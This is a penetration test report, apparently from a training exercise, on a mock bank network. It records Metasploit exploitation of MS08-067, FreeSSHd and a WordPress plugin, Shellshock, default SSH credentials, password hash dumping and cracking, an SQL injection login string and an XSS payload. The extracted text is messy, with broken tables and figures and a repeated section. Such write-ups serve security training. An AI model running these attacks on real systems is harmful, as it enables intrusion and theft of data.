Professional Documents
Culture Documents
X S E C U R I T Y, L L C
PenetrationTestingandSecurityAuditforFNBFinancialServices
Warning: THIS DOCUMENT, AND ALL ACCOMPANYING MATERIALS, MAY CONTAIN INFORMATION THAT COULD
SEVERELY DAMAGE OR IMPACT THE INTEGRITY AND SECURITY OF THE ORGANIZATION IS DISCLOSED PUBLICLY.
THIS DOCUMENT, AND ALL ACCOMPANYING MATERIALS, SHOULD BE SAFEGUARDED AT ALL TIMES AND
MAINTAINED IN A SECURE AREA WHEN NOT IN USE. XSECURITY, LLC ASSUMES NO RESPONSIBILITY OR LIABILITY
FOR THE SECURITY OF THIS DOCUMENT OR ANY ACCOMPANYING MATERIALS AFTER DELIVERY TO THE
ORGANIZATION NAMED HEREIN. IT IS THE ORGANIZATION’S RESPONSIBILITY TO SAFEGUARD THIS MATERIAL
AFTER DELIVERY.
THIS REPORT CONTAINS PROPRIETARY INFORMATION THAT IS NOT TO BE SHARED, COPIED, DISCLOSED OR
OTHERWISE DIVULGED WITHOUT THE EXPRESS WRITTEN CONSENT OF XSECURITY OR THEIR DESIGNATED
REPRESENTATIVE.USE OF THIS REPORTING FORMAT BY OTHER THAN XSECURITY OR ITS SUBSIDIARIES IS STRICTLY
PROHIBITED AND MAY BE PROSECUTED TO THE FULLEST EXTENT OF THE LAW.
Disclaimer: THE RECOMMENDATIONS CONTAINED IN THIS REPORT ARE BASED ON INDUSTRY STANDARD
“BEST PRACTICES”. BEST PRACTICES ARE, BY NECESSITY, GENERIC IN NATURE AND MAY NOT TAKE INTO ACCOUNT
EXACERBATING OR MITIGATING CIRCUMSTANCES. THESE RECOMMENDATIONS, EVEN IF CORRECTLY APPLIED, MAY
CAUSE CONFLICTS IN THE OPERATING SYSTEM OR INSTALLED APPLICATIONS. ANY RECOMMENDED CHANGES TO
THE OPERATING SYSTEM OR INSTALLED APPLICATION SHOULD FIRST BE EVALUATED IN A NON-PRODUCTION
ENVIRONMENT BEFORE BEING DEPLOYED IN YOUR PRODUCTION NETWORK.
XSECURITY, LLC
SUITE 180 ● ALBUQUERQUE, NM 87048 USA
PHONE 505.XXX.XXXX ● FAX 505.XXX.XXXX
Document Details
Classification Confidential
Version 1.0
Dec 30th, 2016 v1.2 Geeta Singh Checked for formatting and proofreading
Abhijitt
Dec 21st, 2016 v1.1 Edited and made changes to content
Chougulle
Recipient
Contact
Email abhijitt.chougulle@gmail.com
Table of Contents
Document Details........................................................................................................................................................3
Version History Information.......................................................................................................................................3
Recipient.....................................................................................................................................................................3
Penetration Testing Team Members...........................................................................................................................4
Contact........................................................................................................................................................................4
1.0 Executive Summary...........................................................................................................................................7
1.1. Project Scope.................................................................................................................................................8
1.2. Project Objectives.........................................................................................................................................8
1.3. Target Systems..............................................................................................................................................8
1.4. Assumptions..................................................................................................................................................9
1.5. Timeline........................................................................................................................................................9
1.6. Summary of Evaluation.................................................................................................................................9
1.7. Finding Rating Levels.................................................................................................................................10
1.8. Risk Assessment Metrix..............................................................................................................................10
1.1. Summary of Findings..................................................................................................................................11
1.2. Summary of Recommendation....................................................................................................................12
1.2.1. Personnel............................................................................................................................................12
1.2.2. Policies and Procedures......................................................................................................................12
1.2.3. Critical Vulnerabilities.......................................................................................................................12
1.2.4. Identification and Authentication.......................................................................................................13
1.2.5. Intrusion Detection.............................................................................................................................13
1.2.6. Conclusion..........................................................................................................................................14
1.3. Testing Methodology..................................................................................................................................14
1.3.1. Planning..............................................................................................................................................14
1.3.2. Exploitation........................................................................................................................................14
1.3.3. Reporting............................................................................................................................................14
2.0 Comprehensive Technical Report....................................................................................................................15
[Challenge 1:] Information Gathering......................................................................................................................15
controls to ensure compliance with existing policies and to ensure that timely and adequate
review of log files is occurring.
The assessment performed was focused on FNB Financial Services’ internal network and its
related application infrastructure. This result is intended to be an overall assessment of FNB
Financial Services network, and those systems and subnets that fall within the scope of this
project.
Furthermore, the findings in this report reflect the conditions found during the testing, and do not
necessarily reflect current conditions.
The objective of FNB Financial Services’ network and application assessment is to determine the
overall security by analyzing all possible transactions, user input variables, and application
components that reside on network systems. For the testing, we attempted to perform a black-box
test.
The objective of the security assessment and penetration test of the network infrastructure
supporting the application is to determine the overall security of the network segments and hosts
within the scope of the engagement.
1.3. Target Systems
The following table lists all devices that were targeted during this assessment.
1.4. Assumptions
We assumed that all IP addresses are public IP addresses and the organization has implemented
the security policies available with them.
1.5. Timeline
Perform broad scans to identify potential areas of exposure and services that may act as
entry points
Perform targeted scans and manual investigation to validate vulnerabilities
The test identified components to gain access to”
o <10 IP addressed devices>
Identify and validate vulnerabilities
Rank vulnerabilities based on threat level, loss potential, and likelihood of exploitation
Perform supplemental research and development activities to support analysis
Identify issues of immediate consequence and recommend solutions
Develop long-term recommendations to enhance security
Transfer knowledge
During the network level security checks we tried to probe the ports present on the various
servers and detect the services running on them with the existing security holes, if any. At the
web application level, we checked the web servers’ configuration issues, and more importantly
the logical errors in the web application itself.
In the following Findings section, XSecurity, LLC uses a rating system using stars (*) to indicate
the level of severity of our findings. All findings are vulnerabilities that have a business risk to
the FNB Financial Services.
**** Intruders can easily gain control of hosts and network. This
5 Stars Critical
* needs immediate attention.
4 Stars **** High Intruders can possibly gain control of the host, or there may
be potential leakage of highly sensitive information. This
CONFIDENTIAL Page | Error: Reference source not found
Xsecurity, LLC CONFIDENTIAL Penetration Test Report for
FNB Financial Service
L Low 1-4
M Medium 4-12
H High 12-25
Table 4: Threat Levels
1.1. Summary of
Findings
This General Opinion will discuss several overarching concerns that became apparent during the
Penetration Testing. This discussion is intended to provide more in-depth and detailed analysis of
the various issues brought forth in the Executive Summary and provides further illumination on
the more significant risks to FNB Financial Services.
1.2.1. Personnel
While several people involved with maintaining the network and systems have expressed
concerns over the access given to entities (such as developers), the FNB Financial Services
security architecture does not provide, by design, any means of limiting these individual's or
group's network infrastructure access. FNB Financial Services tends to accept the risks
associated with having a completely open internal architecture in order to accommodate the
fluid and changing nature of the environment. However, a documented rationale should
accompany any risks that are accepted.
FNB Financial Services has several knowledgeable and skilled individuals in the Information
Technology department. These individuals are aware of security- related issues and
understand that their internal systems are completely open and accessible. They differ in their
opinions as to the severity of this situation. The situation entrusts a great deal of power and
responsibility, to the point that any one of a handful of administrators, acting independently,
CONFIDENTIAL Page | Error: Reference source not found
Xsecurity, LLC CONFIDENTIAL Penetration Test Report for
FNB Financial Service
has the capability to compromise a system without any of the other administrators being
aware that any misuse has occurred. This requires a great deal of trust in these administrators,
which is evidently well placed; however, future employees who may hold these positions
may not be as trustworthy. Without measures in place to monitor the activity of such
individuals, current or future intrusions or compromises may not be detectable.
The user privileges were managed by the systems Reference Monitor, which was an integral
part of the operating system. Therefore, any change in the user's privilege level was
immediately enforced by the operating system, so there was a period of time when the user's
privileges that were in effect did not match the privileges that the user was invoking. In
networked environments, the practice still exists of granting privilege at the time of log-in.
However, because there is no centralized Reference Monitor that is directly tied into each
and every operating system on the network, a change in the user's privilege level is not
registered until the user logs off the network and then logs back on. This is the TOCTOU
problem. Identification and Authentication services, when coupled with a timely service, can
resolve this issue in that they force users to present their credentials before accessing any
resource on the network. This provides a chance for the privileges to be checked, as well as
ensuring the authenticity of the identity of the user ID accessing the resource.
1.2.6. Conclusion
Regardless of the frequency of vulnerability testing, no critical system can be considered
acceptably protected unless both the network segments and the critical hosts/servers are
monitored constantly for signs of abuse and intrusion attempts. Because new exploits and
vulnerabilities within devices and network operating systems are discovered regularly, it is
impossible to test a network completely, giving 100 percent assurance of being impervious to
penetration either from within or from outside. Additionally, FNB Financial Services has
chosen a trust model in which the application of stronger internal controls is more difficult
than in a more restrictive trust model. Therefore, the easiest method of detecting misuses
would be some type of intrusion detection system that is both network based and can do user
profiling. Without appropriate identification and authentication of users, referencing abuses
to specific individuals becomes unreliable. Without appropriate audit controls to ensure
compliance with policies, the policies and procedures themselves become untenable.
XSecurity, LLC believes the corrective actions and recommendations in this report will
improve FNB Financial Services's ability to avoid breaches of information security.
CONFIDENTIAL Page | Error: Reference source not found
Xsecurity, LLC CONFIDENTIAL Penetration Test Report for
FNB Financial Service
1.3.1. Planning
During the planning, we gather information from the server in which the web application is
installed. Then, we detect the path information and identifiable software and determined the
running their versions.
1.3.2. Exploitation
Utilizing the information gathered during the planning, we start to find the vulnerability for
each piece of software and service that we discovered after that trying to exploit it.
1.3.3. Reporting
Based on the results from the first two steps, we start analyzing the results. Our risk rating is
based on this calculation:
Risk = Threat * Vulnerability * Impact
After calculating the risk rating, we start writing the report on each risk and how to mitigate
it.
case that is very much true because Zenmap will give you an interactive graphical map of your
network.
SolarWinds: IT monitoring and management tools are built for SysAdmins and network
Nessus : Nessus is a remote security scanning tool, which scans a computer and raises an alert
if it discovers any vulnerabilities that malicious hackers could use to gain access to any
computer you have connected to a network.
Methodology:
We need to identify all the machines in the network and we do not have any details.
From the Windows machine first found the Gateway of the machine by ipconfig/all ie.
192.168.1.1 (screen shot given below)
S
Figure 1.1
Then with the help of Solarwind discovered other network IP address ie
172.19.19.1,172.17.0.1,10.10.0.1,.(screen shot given below)
Figure 1.2
With Zenmap tool and command nmap -sn -T4 -v 172.19.19.1/24 Found live hosts
172.19.19.1,172.19.19.2,12.19.19.3,172.19.19.4,172.19.19.5,172.19.19.6,172.19.19.7,172.19.19.
8,172.19.19.9,172.19.19.10
Figure 1.3
With Zenmap tool and command nmap -sn -T4 -v 172.17.0.1/24 .Found live hosts
172.17.0.1,172.17.0.2,172.17.0.3
Figure 1.4
With Zenmap tool and command nmap -sn -T4 -v 10.10.0.1/24 Found live hosts 10.10.0.1,
10.10.0.2, 10.10.0.3
Figure 1.5
All Host Topology Diagram:
Operating System and version of Machine 10.10.01 :Microsoft Windows Server 2003 with
Service Pack 2 (SP2) ver 5.2 and Build 3790
With Zenmap tool and command nmap -p 445 --script smb-os-discovery 10.10.0.1 discovered the
operating system and host name of machine 10.1.0.1
Figure 1.6
With Zenmap tool and command nmap -p 445 --script smb-os-discovery 10.10.0.2 discovered the
operating system and host name of machine 10.1.0.2
Figure 1.7
With Zenmap tool and command nmap -p 445 --script smb-os-discovery 10.10.0.3 discovered the
operating system and host name of machine 10.1.0.3
Figure 1.8
Operating System and version of Machine 172.17.0.1 :
Microsoft Windows Server 2003 with Service Pack 2 (SP2) ver 5.2 and Build 3790
With Zenmap tool and command nmap -p 445 --script smb-os-discovery 172.17.0.1 discovered the
operating system and host name of machine 172.17.0.1
AND
Figure 1.9
With the help of Zenmap tool coudn’t discover the operating system of the this machine
hence used Nesus tool to discover operating system of 172.17.0.3
Figure 1.10
With Zenmap tool and command nmap -p 445 --script smb-os-discovery 172.19.19.1 discovered the
operating system and host name of machine 172.19.19.1
AND
Figure 1.11
With Zenmap tool and command nmap -p 445 --script smb-os-discovery 172.19.19.3 discovered the
operating system and host name of machine 172.19.19.3
AND
With Zenmap tool and command nmap -p 445 --script smb-os-discovery 172.19.19.4 discovered the
operating system and host name of machine 172.19.19.4
Figure 1.11
With the help of Zenmap tool coudn’t discover the operating system of the this machine
hence used Nesus tool to discover operating system of 172.19.19.5
Figure 1.11
Figure 1.12
Operating
System and
version of
Machine
172.19.19.7 :
Microsoft Windows server 2008 standard with service pack 1 (SP1) ver 6.0 and Build 6001
With Zenmap tool and command nmap -p 445 --script smb-os-discovery 172.19.19.7 discovered the
operating system and host name of machine 172.19.19.7
AND
Operating System and version of Machine 172.19.19.8 :
Microsoft windows XP
With Zenmap tool and command nmap -p 445 --script smb-os-discovery 172.19.19.8 discovered the
operating system and host name of machine 172.19.19.8
Figure 1.13
With Zenmap tool and command nmap -p 445 --script smb-os-discovery 172.19.19.9 discovered the
operating system and host name of machine 172.19.19.9
AND
Operating System and version of Machine 172.19.19.10 :
Microsoft Windows 7 ultimate with service pack 1(SP1) ver 6.1 and Build 7601
With Zenmap tool and command nmap -p 445 --script smb-os-discovery 172.19.19.10 discovered the
operating system and host name of machine 172.19.19.10
Figure 1.14
Open ports in all the machines /Services running in all the open ports
Figure 1.15
Figure 1.16
Open ports and services running of Machine 10.10.03:
With Zenmap tool and command nmap -sS -sV -T4 -v 10.10.0.3/24 discovered the open ports and
services running of machine 10.10.0.3
Figure 1.17
Figure 1.18
Figure 1.19
Figure 1.20
Open ports and services running of Machine 172.19.19.1:
With Zenmap tool and command nmap -sS -sV -T4 -v 172.19.19.1/24 discovered the open ports and
services running of machine 172.19.19.1
Figure 1.21
With Zenmap tool and command nmap -sS -sV -T4 -v 172.19.19.2/24 discovered the open ports and
services running of machine 172.19.19.2
Figure 1.22
Figure 1.23
Figure 1.24
Figure 1.25
Figure 1.26
Figure 1.27
Open ports and services running of Machine 172.19.19.8:
With Zenmap tool and command nmap -sS -sV -T4 -v 172.19.19.8/24 discovered the open ports and
services running of machine 172.19.19.8
Figure 1.28
Figure 1.29
Figure 1.19
HAVE LISTED THE GIVEN BELOW WHICH CAN BE USED AS REFERENCE FOR FUTHER
PENTEST :
LIST OF ALL IP ADDRESS OF ALL MACHINES/OPERATING SYSTEM AND THERE VERSIONS/HOST
NAMES/OPEN PORTS IN RESPECTIVE MACHINE AND SERVICES RUNNING IN ALL OPEN PORTS
Sr IP address of Operating system Host names Open ports in Services running in all open
no all Machines and there versions respective ports
machine
1 172.19.19.1 Microsoft GNAT 135 msrpc
Windows Server 139 netbios-ssn
2003 with Service 445 microsoft-ds
Pack 2 (SP2) ver 1025 msrpc
5.2 and Build 3389 mswbt-server
3790
12 172.17.0.2 21
Microsoft WIN-AG46I02QBKJ 80 tcpwrapped
Windows Server 135 http
2008 R2 139 msrpc
Enterprise Service 445 netbios-ssn
Pack 1(SP1) ver 3389 netbios-ssn
6.1 Build 7601 49152 ms-wbt-server
49153 msrpc
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
msrpc
CHALLENGE 2:
Objective:
Exploit and root the machine named Operations and do the following:
1. Present the hash value of the file “Employee Insurance Details.xlsx” hidden somewhere
in the user folders.
2. FNB management has discovered one of their employees has transferred sensitive
information outside the organization using their machine. The network admin tried to
ascertain this but could not find anything concrete. He however did discover some large
images in a folder named Personal. This was in violation to the organization’s policy of
not storing any personal information on office computers. As a penetration tester, your
task is to verify if these images were used to send sensitive information and present the
hidden message in the pen testing report.
IP address of all Operating Host names Open ports in Services running in all open
Machines system and there respective machine ports
versions
.
Threat Description: This is a remote code execution vulnerability. An attacker who
successfully exploited this vulnerability could take complete control of an affected system
remotely. On Microsoft Windows 2000-based, Windows XP-based, and Windows Server 2003-
based systems, an attacker could exploit this vulnerability over RPC without authentication and
could run arbitrary code. If an exploit attempt fails, this could also lead to a crash in Svchost.exe.
If the crash in Svchost.exe occurs, the Server service will be affected. The Server service
provides file, print, and named pipe sharing over the network.
The vulnerability is caused by the Server service, which does not correctly handle specially
crafted RPC requests.
Tools Used:
Nessus : Nessus is a remote security scanning tool, which scans a computer and raises an alert
if it discovers any vulnerabilities that malicious hackers could use to gain access to any
computer you have connected to a network.
QuickStego : QuickStego lets you hide text in pictures so that only other users of QuickStego
can retrieve and read the hidden secret messages. Once text is hidden in an image the saved
picture is still a 'picture', it will load just like any other image and appear as it did before.
Methodology:
Challenge 2.1: Present the hash value of the file “Employee Insurance Details.xlsx” hidden
somewhere in the user folders.
With the help of Nessus Tool done the Vulnerability assessment and found the vulnerability
MS08-067 which is a remote code execution vulnerability
Figure 2.1.1
Then searched for the exploit module from Rapid7 website shown below
Figure 2.1.2
Figure 2.1.3
By using Kali Operating system machine, started the exploit process by opening command line terminal,
and typed msfconsole and pressed Enter. This launched msfconsole.
Figure 2.1.4
Then searched for exploit as shown in below Figure2.1.5
Figure 2.1.5
Search results of the screen shot and used the searched exploit as shown below Figure2.6 a
Figure2.1.6
Then used the show command to search for the payload option
Figure2.1.7
Figure2.1.8
Figure2.1.9
The typed show options command as shown below to check for the LHOST,RHOST,RPORT
Figure2.1.10
The typed show options command as shown below to check for the LHOST,RHOST,RPORT
Figure2.1.11
Figure2.1.13
After downloading the file extracted out the md5sum value of the file “Employee Insurance details.xlsx “
Figure2.1.14
Recommendation:
Block TCP ports 139 and 445 at the firewall .These ports are used to initiate a connection with
the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect
systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft
recommends that you block all unsolicited inbound communication from the Internet to help
prevent attacks that may use other ports.
Also Microsoft have stopped support for Windows XP.It is recommended that not use windows
Xp since there are no secuirty patches and update available for the same.
3. Challenge 2.2 : FNB management has discovered one of their employees has transferred
sensitive information outside the organization using their machine. The network admin
tried to ascertain this but could not find anything concrete. He however did discover
some large images in a folder named Personal. This wasin violation to the organization’s
policy of not storing any personal information on office computers. As a penetration
tester, your task is to verify if these images were used to send sensitive information and
present the hidden message in the pen testing report.
With the help of Nessus Tool done the Vulnerability assessment and found the vulnerability
MS08-067 which is a remote code execution vulnerability
Figure2.1.1
Figure2.1.2
Searched for the exploit module from Rapid7.com website ,searched results given below.
Figure2.1.3
We launched a new command line terminal, typed msfconsole and pressed Enter. This
launches msfconsole.
Figure2.1.4
Then
searched for
exploit as
shown in
below
Figure
Figure2.1.5
Then typed the use command with the searched module as shown in given below figure.
Figure2.1.5
Displayed below is the results of the use command with the searched module
Figure2.1.6
Figure 2.1.8
The typed show options command as shown below to check for the LHOST,RHOST,RPORT,LPORT
Figure 2.1.9
Then set the LHOST,RHOST,RPORT,LPORT and then exploited
Figure 2.1.9
After gaining the meterpreter session searched for the Jpg and bmp files with the help of the search command found
the
files in c:\Documents and settings\Administrator\My Documents\Personal folder.
Figure 2.1.1
After searching downloaded the jpg and bmp files from c:\Documents and
settings\Administrator\MyDocuments\Personal folder .
Figure 2.1.12
After downloading personal folder, changed the access permissions and copied the folder from root and paste in
root/var/www, Started the apache server
Figure 2.1.11
Through Apache
web browsed the
directory
containing
jpg,bmp files.
Figure 2.1.12
Thumbnail view of the jpg and bmp files in the folder
Figure 2.1.12
QuickStego lets you hide text in pictures so that only other users of QuickStego can retrieve and
read the hidden secret messages.From the 4 jpg,bmp file .With the help of this tool retrieved the
message from the bmp file The_sower.bmp
Figure 2.1.13
Recommendation: Further Strengthen the IT security policy and information access to be given
as per role based and need based.Conduct internal Audit to verify the same has been
implemented and followed.
CHALLENGE 3:
Objective:
Compromise the Ubuntu machine in the network. The challenge requires you to present the
hash value of the file "Customer Data.xlsx". This file contains customer sensitive
information such as credit card details.
IP address of all Operating Host names Open ports in Services running in all open
Machines system and there respective machine ports
versions
Threat Description: GNU Bash vulnerability, referred to as Shellshock or the "Bash Bug", was
disclosed. In short, the vulnerability allows remote attackers to execute arbitrary code given
certain conditions, by passing strings of code following environment variable assignments
Tools Used:
Dirbuster :
DirBuster is a multi threaded java application designed to brute force directories and files names
on web/application servers. Often is the case now of what looks like a web server in a state of
default installation is actually not, and has pages and applications hidden within. DirBuster
attempts to find these.
Burpsuite:
Burp Suite is an integrated platform for performing security testing of web applications. Its
various tools work seamlessly together to support the entire testing process, from initial mapping
and analysis of an application's attack surface, through to finding and exploiting security
vulnerabilities.
Methodology:
Scanned for vulnerabilities
Figure.3.1
With the help of Dirbuster tool tried to brute force the ubuntu server and found the following files
and cgi-bin directory
Figure.3.2
Figure.3.3
Browsed the
given below url
and intercepted in
Burpsuite tool
and it showed it
was a
demonstrattion of
shell shock
vulnerability
Figure 3.4
With the help of the given below script
Figure 3.5
With the given below script found the folders on the machine /home/Jason
Figure 3.6
With the given below script found the file Customer Data.xlsx file of which md5sum needs to be extracted.
Figure
3.7
With the given below script extracted the md5sum of the Customer Data.xlsx
Figure 3.8
Recommendation :Be sure to update all of your affected servers to the latest version of Bash! Also, be sure to keep
your servers up to date with the latest security update,
CHALLENGE 4:
Objective:
Compromise the Cent OS machine in the network. The challenge requires you to present the
hash value of the file named "Terms of Service". This file contains sensitive agreements between
FNB and their customers.
IP address of all Operating Host names Open ports in Services running in all open
Machines system and there respective machine ports
versions
Threat Description:
A SSH bruteforce attack automatically and systematically attempts to guess the correct username
and private combination for a service. Its goal is to find valid logins and leverage them to gain
access to a network to extract sensitive data, such as password hashes and tokens
. Tools Used:
Putty:
PuTTY is an SSH and telnet client, developed originally by Simon Tatham for the Windows
platform. PuTTY is open source software that is available with source code and is developed and
supported by a group of volunteers.
Methodology:
Done vulnerability assessment with the help of Greenbone Security Assistant and found the
below attached SSH brute force login with default login vulnerability.
Figure 4.1
Further extracted the default login credentials ie username:root and password:password as shown
below
Figure 4.2
With the help of Putty tool logged in to the server with default credentials ie username: root and password:
password
Figure 4.3
Once connected to the server ,with the help of “ls “ command listed the directory structure and searched for the file
name Terms of Service.pdf for whose md5sum is to be calculated.We found the file in the /home/Admin/Documents
folder.Finally extracted the md5sum of the pdf file as shown in the below figure
Figure 4.4
Recommendation:It is recommended that always follow standard password policy ie.minimum of 8 characters and
Alphanumeric with special characters and non guessable strong passwords.
CHALLENGE 5:
Objective:
Exploit one of the vulnerable applications in the machine named ACCOUNTS.
1. Present the hash value of a file named FNB_Trading_Summary.
2. Find the password of a user name Arnold.
IP address of all Operating Host names Open ports in Services running in all open
Machines system and there respective machine ports
versions
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
Threat Description:
The remote SSH server is configured to allow weak encryption algorithms
Tools Used:
Greenbone Security Assistant :
The Greenbone Security Assistant is a web application that connects to the OpenVAS Manager
and OpenVAS Administrator to provide for a full-featured user interface for vulnerability
management.
Cain & Abel : Cain & Abel is a password recovery tool for Microsoft Operating Systems. It
allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted
passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP
conversations, decoding scrambled passwords, recovering wireless network keys, revealing
password boxes, uncovering cached passwords and analyzing routing protocols.
Methodology:
Done vulnerability assessment with the help of Greenbone Security Assistant and found the
below attached SSH weak encryption Algorithm supported vulnerability.
Figure 5.1
SSH weak encryption Algorithm supported vulnerability result details
Figure 5.2
Searched for the exploit module of freesshd as shown below.
Figure 5.3
By using Kali Operating system machine, started the exploit process by opening command line terminal, and typed
msfconsole and pressed Enter. This launched msfconsole. And used exploit windows/ssh/Freesshd_Authbypass.
Then typed show options
Figure 5.4
And used exploit windows/ssh/Freesshd_Authbypass.The typed show options command as shown below to check
for the LHOST,RHOST,RPORT.
Then set the RHOST,RPORT ,set USER_FILE /usr/share/metasploit.framework/data/wordlists/unix_users.txt and
then exploit
Figure 5.5
Exploitation out as shown in figure below.
Figure 5.6
After gaining the meterpreter session with the help of shell command took windows machines access
Figure 5.7
From the command prompt of windows typed the command “dir FNB*.* /s “ and searched for the file
FNB_Trading_Summary.xls.Then exited from the shell command prompt and downloaded the file from the give
path below in screen shot.Exited from the meterpreter and came back to msfconsole and used
Figure 5.7
Then set session 1 and then exploited and typed “hashdump” command and got the hash dump of users shown
below screen shot.Then copied the hashdump in a file Arnold.txt file and moved to www folder.
Figure 5.7
After getting the hashdump found the md5sum of the file FNB_Trading_Summary.xls.Then started Apache service
to browse and get the file Arnold.txt
Figure 5.8
As mentioned
above copied the
file to the www
folder.
Figure 5.9
Just displayed and verified the content of the hashdump is present in text file.
Figure 5.10
Installed Cain &Able tool to crack the password of the Arnold from the Hashdump Arnold.txt file and cracked the
password ie orange as shown below
Figure 5.11
. Threat Description :
SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious
SQL statements (also commonly referred to as a malicious payload) that control a web
application’s database server (also commonly referred to as a Relational Database Management
CONFIDENTIAL Page | Error: Reference source not found
Xsecurity, LLC CONFIDENTIAL Penetration Test Report for
FNB Financial Service
System – RDBMS). Since an SQL Injection vulnerability could possibly affect any website or
web application that makes use of an SQL-based database, the vulnerability is one of the oldest,
most prevalent and most dangerous of web application vulnerabilities.
Cross-Site Scripting (XSS) is probably the most common singular security vulnerability existing
in web applications at large. It has been estimated that approximately 65% of websites are
vulnerable to an XSS attack in some form, a statistic which should scare you as much as it does
me.
Tools Used:
Methodology:to perform web application penetration test on FNB’s official website opened the
URL www.fnb.com.
Figure 6.1
Figure 6.2
In the user name and password field and typed string Fnb’ 1=1’ -- in username and password field
Figure 6.3
Was able to do sql injection and logged in through user Smith as shown below.
Figure 6.4
Further to Perform an XSS attack went to Contact field of the website e and typed Name:
customer and inserted script in Message Field : <script>alert("YOUR SYSTEM IS HACKED
XSS")</SCRIPT> a
Figure 6.5
Figure 6.6
Recommendation:
Input Validation is any web application’s first line of defense. That said, Input Validation is
limited to knowing what the immediate usage of an untrusted input is and cannot predict where
that input will finally be used when included in output. Practically all free text falls into this
category since we always need to allow for valid uses of quotes, angular brackets and other
characters.
CHALLENGE 7:
Objective:
Exploit the machine named “HRDEPT” and present the hash value of the file “Employee
Details.xlsx”.
IP address of all Operating Host names Open ports in Services running in all open
Machines system and there respective machine ports
versions
Threat Description: The content management used by HR department is in WORD PRESS and
WordPress is a database-backed platform that executes server-side scripts in PHP. Both of these
characteristic can make WordPress vulnerable to malicious URL insertion attacks. Commands
are sent to WordPress via URL parameters, which can be abused by hackers who know how to
construct parameters that WordPress may misinterpret or act on without authorization
Tools Used: Nessus : Nessus is a remote security scanning tool, which scans a computer and
raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to
any computer you have connected to a network.
WPS scan:WPScan is a black box WordPress vulnerability scanner
Methodology:
With the help of Nessus Tool done the Vulnerability assessment and found the vulnerability
given below
Figure 7.1
Opened the url http://172..19.19.6 found the gievn below details
Figure 7.2
Further entering the project ECSA found that the content management system used is “ Word Press “
Figure 7.2
Further done view source of the webpage and found the results below
Figure 7.3
Figure 7.4
Run the command wpscan --url http://172.19.19.6/ecsa
Figure 7.5
Enumerating plugins from the passive detection and found inboundio-marketing plugins
Figure
7.6
Figure 7.7
The typed show options command as shown below to check for the RHOST,RPORT and TARGETURI
Figure
7.8
Then
set the
RHOST 172.19.19.6 and set the TARGETURI and confirmed by show options
Figure
7.9
Then
set the
TARGETURI /ECSA
Figure
7.10
Then
done
the
Figure 7.11
Figure 7.12
After gaining the Meterpreter session with the help of search command search -f “Employee Details.xlsx” -d c:\
found the file.Then downloaded the file.
Figure
7.13
After
downloading the file extracted the md5sum of the file “Employee Details.xlsx” as shown in the screen shot below
CONFIDENTIAL Page | Error: Reference source not found
Xsecurity, LLC CONFIDENTIAL Penetration Test Report for
FNB Financial Service
Figure
7.14
CHALLENGE 8:
Objective:
Extract employee data from the Active Directory machine in the network. You need to
compromise and take control of the AD first.
IP address of all Operating Host names Open ports in Services running in all open
Machines system and there respective machine ports
versions
49161 msrpc
49165
Threat Description :
The most severe of the vulnerabilities could allow remote code execution if an attacker sent a
specially crafted SMB packet to a computer running the Server service. Firewall best practices
and standard default firewall configurations can help protect networks from attacks that originate
from outside the enterprise perimeter. Best practices recommend that systems that are connected
to the Internet have a minimal number of ports exposed.
Tools Used:
Nessus : Nessus is a remote security scanning tool, which scans a computer and raises an alert if
it discovers any vulnerabilities that malicious hackers could use to gain access to any computer
you have connected to a network.
Methodology:
With the help of Nessus Tool done the Vulnerability assessment and found the SMB
vulnerability given below
Figure 8.1
Used the Nmap tool to breute force user name and password
Figure 8.2
With the help of nmap --script smb-brute.nse -p445 172.19.19.3 extracted the username ans password credential of
the Active directory server.
Figure 8.3
By using
Kali
Operating
system
machine,
started the
exploit
process
by
opening
command
line
terminal,
and typed
Figure
8.4
Then
used the
exploit/windows/smb/psexec and typed show options command to see the module options
Figure
8.5
Then set
the
RHOST
172.19.19.3
Figure 8.6
The set SMBPass mango,SMBUser administrator
Figure
8.7
Set
payload
Figure
8.8
Set
LHOST
Figure 8.9
Set SMBPass mango and verified with show options
Figure 8.10
Then exploited the machine and gained meterpreter session.After gaining meterpreter exported Active directory
user data with the help of command line toll csvde -f “Employee Data.csv”
Figure 8.11
Figure 8.12
Find the
extracted
Employee
Data.csv
file shown
in screen
shot.
Figure 8.13
Recommendation : It is recommended that always follow standard password policy ie.minimum of 8 characters and
Alphanumeric with special characters and non guessable strong passwords.
CHALLENGE 9:
Objective:
Exploit web applications on the “ENTERTAINMENT” machine and perform the following
post exploitation activities:
1. Present the contact number for a user named Steve on the http://[Host IP]/moviescope
site.
2. Extract the Tables and users of the http://[Host IP]/xsecurity site.
3. Present the SQL server database version on this machine.
IP address of all Operating Host names Open ports in Services running in all open
Machines system and there respective machine ports
versions
Threat Description:SQL injection is an attack in which malicious code is inserted into strings
that are later passed to an instance of SQL Server for parsing and execution. Any procedure that
constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server
will execute all syntactically valid queries that it receives. Even parameterized data can be
manipulated by a skilled and determined attacker.
The primary form of SQL injection consists of direct insertion of code into user-input variables
that are concatenated with SQL commands and executed. A less direct attack injects malicious
code into strings that are destined for storage in a table or as metadata. When the stored strings
are subsequently concatenated into a dynamic SQL command, the malicious code is executed.
The injection process works by prematurely terminating a text string and appending a new
command. Because the inserted command may have additional strings appended to it before it is
executed, the malefactor terminates the injected string with a comment mark "--". Subsequent
text is ignored at execution time.
Tools Used:
sqlmap : Sqlmap is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of database servers
CONFIDENTIAL Page | Error: Reference source not found
Xsecurity, LLC CONFIDENTIAL Penetration Test Report for
FNB Financial Service
Threat Description:SQL injection is an attack in which malicious code is inserted into strings
that are later passed to an instance of SQL Server for parsing and execution. Any procedure that
constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server
will execute all syntactically valid queries that it receives. Even parameterized data can be
manipulated by a skilled and determined attacker.
The primary form of SQL injection consists of direct insertion of code into user-input variables
that are concatenated with SQL commands and executed. A less direct attack injects malicious
code into strings that are destined for storage in a table or as metadata. When the stored strings
are subsequently concatenated into a dynamic SQL command, the malicious code is executed.
The injection process works by prematurely terminating a text string and appending a new
command. Because the inserted command may have additional strings appended to it before it is
executed, the malefactor terminates the injected string with a comment mark "--". Subsequent
